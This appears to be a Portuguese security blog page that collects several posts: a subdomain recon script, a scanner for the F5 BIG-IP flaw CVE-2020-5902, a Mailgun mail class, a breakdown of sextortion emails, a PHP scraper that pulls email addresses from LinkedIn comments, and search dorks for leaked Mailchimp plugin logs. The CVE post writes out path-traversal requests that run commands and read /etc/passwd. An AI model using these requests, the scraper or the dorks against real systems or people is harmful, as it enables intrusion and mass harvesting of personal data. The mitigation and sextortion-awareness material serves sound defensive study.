Simple Recon Subdomain

18:01

This is very basic automated recon script tool.

 

I used web tools for enumerate host and ip.
 
TARGET IS A MAGIC STRING

curl -s "https://rapiddns.io/subdomain/TARGET?full=1#result" | awk -v RS='<[^>]+>' '/$1/' | sort -u >>TARGET-rapiddns.txt
curl -s "https://riddler.io/search/exportcsv?q=pld:TARGET" | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u >>TARGET-riddler.txt
curl -s "https://jldc.me/anubis/subdomains/TARGET" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u >>TARGET-jldc.txt
curl -s "https://crt.sh/?q=%25.TARGET&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u >>TARGET-crt.txt
curl -s "https://dns.bufferover.run/dns?q=.TARGET" | jq -r .FDNS_A[] | sed -s 's/,/\\n/g' | sort -u >>TARGET-bufferover.txt
cat TARGET-*.txt | sort -u >TARGET.txt;cat TARGET.txt -n



 User tool:

python tool.py {target}
python tool.py fbi.gov

Screenshot Screenshot 

 

OUTPUT

TARGET-rapiddns.txt
TARGET-riddler.txt
TARGET-jldc.txt
TARGET-crt.txt
TARGET-bufferover.txt

OUTPUT SORT UNIQ

TARGET.txt 

 

Download tool:
https://github.com/MrCl0wnLab/SimpleReconSubdomain

Scan IP Checker CVE-2020-5902

17:04


Checker CVE-2020-5902: BIG-IP versions 15.0.0 through 15.1.0.3, 14.1.0 through 14.1.2.5, 13.1.0 through 13.1.3.3, 12.1.0 through 12.1.5.1, and 11.6.1 through 11.6.5.1 suffer from Traffic Management User Interface (TMUI) arbitrary file read and command execution vulnerabilities.

Os dispositivos BIG-IP, fabricados pela F5 Networks, integram funções como gerenciar tráfego de rede, gerenciamento de segurança de aplicativos e load balancing. BIG-IP são hardware que tem diversas funcionalidades internas que ajudam no gerenciamento e segurança.

O pesquisador da Positive Technologies Mikhail Klyuchnikov que descobriu tal vulnerabilidade RCE registrada com CVE-2020-5902.


A vulnerabilidade descoberta pode ser usada para criar ou excluir arquivos, executar comandos no sistema.

VERSÕES AFETADAS
  • 15.0.0–15.1.0.3
  • 14.1.0–14.1.2.5
  • 13.1.0–13.1.3.3
  • 12.1.0–12.1.5.1
  • 11.6.1–11.6.5.1
CORREÇÃO TEMPORÁRIA ( httpd config )
include '
<LocationMatch ".\*\.\.;.\*">
Redirect 404 /
</LocationMatch>
'

WARNING

+------------------------------------------------------------------------------+
|  [!] Legal disclaimer: Usage of checker-CVE-2020-5902 for attacking          |
|  targets without prior mutual consent is illegal.                            |
|  It is the end user's responsibility to obey all applicable                  | 
|  local, state and federal laws.                                              |
|  Developers assume no liability and are not responsible for any misuse or    |
|  damage caused by this program                                               |
+------------------------------------------------------------------------------+

REQUEST ENVIADOS PELO SCRIPT:
  • TARGET+/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin
  • TARGET+/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
  • TARGET+/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp
  • TARGET+/tmui/login.jsp/..;/tmui/util/getTabSet.jsp
  • TARGET+/tmui/login.jsp/..;/tmui/system/user/authproperties.jsp
  • TARGET+/tmui/login.jsp/..;/tmui/locallb

EXECUÇÃO
$ python3.8 checker.py <ip_start> <ip_end>
$ python3.8 checker.py 192.168.15.1 192.168.15.86

OUTPUT DE VALORES
output.log
error.log

DOWNLOAD TOOL:
https://github.com/MrCl0wnLab/checker-CVE-2020-5902



REFERÊNCIA:

Class SenderMailgun in PHP

18:47


Class PHP criada para envio simples de email via API Mailgun
O usuário deve cadastrar seu domínio dentro da plataforma mailgun e assim gerando os valores de DNS records que será cadastrada em sua zona DNS.

Verifying Your Domain

https://documentation.mailgun.com/en/latest/user_manual.html#verifying-your-domain
Access Your Domains
Access Your Private API Key
Implementation Code

Video

Result:
Email:
Class PHP:
https://github.com/MrCl0wnLab/SenderMailgun

Body Web Sextortion (webcam blackmail) / Anti-Grep

10:52

Sextortion is back


Sextorsão (do termo em inglês sextorsion) é o termo que designa a prática de extorsão a partir da ameaça de exposição de supostas fotos ou vídeos sexuais das vítimas na Internet. Os criminosos intimam divulgar o material a amigos e parentes caso a pessoa não cumpra o favor pedido dentro de um curto período de tempo. Algumas vezes, os golpistas não têm qualquer conteúdo comprometedor da vítima em mãos, mas utilizam mecanismos bastante convincentes para que ela realmente acredite no golpe.

Técnica usada:
A vitima recebe um email com seguinte padrão exemplo: "Estou bem ciente de que XXXXXXXXX é a sua senha". Com a diferença, é claro, que no lugar dos X está a sua combinação verdadeira de alguma senha vazada do usuário. E complemento informando ter um vídeo íntimo seu e que você tem 24 horas para salvar a sua pele.

Sextortion tem seu sucesso por usar dados vazados de vitimas assim adquirindo um contexto maior de veracidade da ameaça contida no email.

Tal técnica nada mais é que um e-mail marketing usando bases vazadas (isso usando contexto citado acima).

Anti-Grep:
Até o pokémon mais bosta evolui.

Substituindo letras por seus pares unicode e assim dificultado filtros grep que buscam pelo padrão strings já bem conhecido por equipes de threathunt.


Uma característica é o usar de * no endereço da carteira de Bitcoin para tentar bypassar algum alerta.



Regex:

\b([13][a-km-zA-HJ-NP-Z1-9]{25,34}|bc1[|\*|ac-hj-np-zAC-HJ-NP-Z02-9]{11,71})\b

Endereço Bitcoin:

https://www.blockchain.com/pt/btc/address/bc1qjma8cz8ry8lr5x3zc8w44cwthstxknr4lpzsdk

Text Blackmail:
https://gist.github.com/MrCl0wnLab/910ea726ab1b9f2a202d7166b5b8f119

Ref:
http://mokagio.github.io/tech-journal/2014/11/21/regex-bitcoin.html
https://www.regextester.com/24
https://www.elpescador.com.br/blog/index.php/deolhonogolpe-relatorio-sobre-sextortion/

Information Gathering: Coleta de email em Posts do Linkedin

19:17


As redes sociais são um buraco sem fim quando se trata de usuários expondo dados pessoais. isso qualquer analista de segurança sabe, e tal característica  pode ser usado como uma fonte rica para ataques direcionados.

Criou-se um comportamento padrão em post's LinkedIn onde o "influenciador" posta um X conteúdo e para você reles mortal ter acesso, tem que fazer um comentar com seu e-mail para o tal "coach" enviar o resto do conteúdo ou uma planilha mágica.


Técnica:

Basicamente encontramos uma padrão de URL nos posts do LinkedIn e com tal informação é possível criar dorks de busca e extrair os emails.

Exemplo de urls:

  1. https://www.linkedin.com/pulse/planilha-de-controle-ordem-produção-marcos-rieper/
  2. https://www.linkedin.com/pulse/planilha-para-avaliação-de-desempenho-e-competências-plano-garcia/
  3. https://www.linkedin.com/pulse/planilha-teste-para-estagiárioxlsdownload-gratuito-arthur/
Identificando o padrão de string www.linkedin.com/pulse/ é possível criar a dork para filtro dos targets.

Dork:

  • site: linkedin.com "linkedin.com/pulse/" "Planilha"

Result:


Extração de target:

A extração é bem simples, usei mais do mesmo RR ( Regex + Request ), o único diferencial é pegar um ID criado no Body do post que possibilita pegar todos e-mails do post sem necessidade de paginação.

Review script de coleta

  • REQUEST PEGANDO ID
    exec("curl -kg --user-agent '{$user_agent}' '{$url_target}'>tmp");
  • GREP  PERMALINK AND ID_URN
    $data_article_permalink =  'cat tmp | grep -oP \'(?<=data-article-permalink=").*?(?=">)\'';")
    '

    $data_article_urn =  'cat tmp | grep -oP \'(?<=data-article-urn="urn:li:article:).*?(?=")\'';
  • URL REQUEST
    $url_request_dump_email = "https://www.linkedin.com/content-guest/article/comments/urn%3Ali%3Aarticle%3A{$return[0]}?count=100&start=0&articlePermalink={$return[1]}"
    ;
  • DUMP FILES
    $file_dump_html = "dump_html_tmp_{$return[0]}";

    $file_dump_email = "emails_{$return[0]}";
  • REQUEST URL DUMP DE COMENTÁRIOS
    exec("curl -kg --user-agent '{$user_agent}' '{$url_request_dump_email}'>'{$file_dump_html}'");
  • GREP EMAILS
    exec('cat "'.$file_dump_html.'" | grep -E -o \'\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b\' | sort | uniq >'.$file_dump_email);
CODE


Result grep:

Script completo: 

https://gist.github.com/MrCl0wnLab/eb26ff29d9b07e79b18bfface7f790d8

Conclusão
:

User continue assim tks.

Recomendação:

User coloca sua senha tbm.


 

Information Gathering: Plugin Mailchimp for WordPress

19:57



É possível coletar informações (E-mails) do log gerado pelo plugin Mailchimp for WordPress no CMS Wodpress.

Isso não se trata de uma falha do plugin de fato, mas sim falta de configuração das pastas, porem pode ser categorizado como vazamento de informação.


Issue no GIT falando sobre:

Logo depois do report foi modificado:

Add migration to rename log file & insert PHP exit header. #281

Add migration to rename log file & insert PHP exit header. #281

O que é o plugin:

Description

Mailchimp for WordPress

Allowing your visitors to subscribe to your newsletter should be easy. With this plugin, it finally is.
This plugin helps you grow your Mailchimp lists and write better newsletters through various methods. You can create good looking opt-in forms or integrate with any existing form on your site, like your comment, contact or checkout form.

Mas ainda em 2019 é possível achar alguns logs ainda indexados.
DORK de busca:

"MailChimp API error: Recipient " ext:log

"MailChimp API error: Recipient "



 Arquivo log localizado em:  /wp-content/uploads/mc4wp-debug.log


Plugin:
https://wordpress.org/plugins/mailchimp-for-wp/


REF:

Fraude Segura

15:01



Por tempos ouvimos de "especialistas" em segurança a famosa frase:
sempre antes de fornecer seus dados verifique se o site tem https e o cadeadinho verde.

Mas estamos em 2019 e essa informação já não basta para falar se site X ou Y é seguro, quanto mais sites com "cadeadinho verde" mais phishings com certificado SSL no processo. E chamo isso de fraude segura.

O ícone de cadeado carregou muito mais peso anos atrás, e para obter um certificado SSL / TLS foi um processo mais difícil, mas esses certificados agora são gratuitos e podem ser adquiridos por qualquer pessoa. Os invasores estão cada vez mais se certificando de que seus sites de phishing tenham certificados autênticos para imitar sites legítimos.
Stu Sjouwerman (CEO knowbe4 )

Devemos modificar nossa visão de como olhar um possível site malicioso, o fato de ter um https ou famoso selo (site blindado) não diz nada.

surfando nos https

Hoje o https virou uma grande aliada para fraudadores no quesito criar uma sensação de segurança em sua técnica de engenharia social Assim como erros de pt-br ficou por terra na argumentativa de identificar uma pagina falsa, o https já não é o grande protetor dos 7 mares da internet.

 

FBI dando update em algumas recomendações:

Seguindo essa ideia e se atualizando o The FBI’s Internet Crime Complaint Center (IC3)  publicou uma nota informando que invasores estão explorando a confiança das pessoas em sites que usam HTTPS.




REFS:



Popular Posts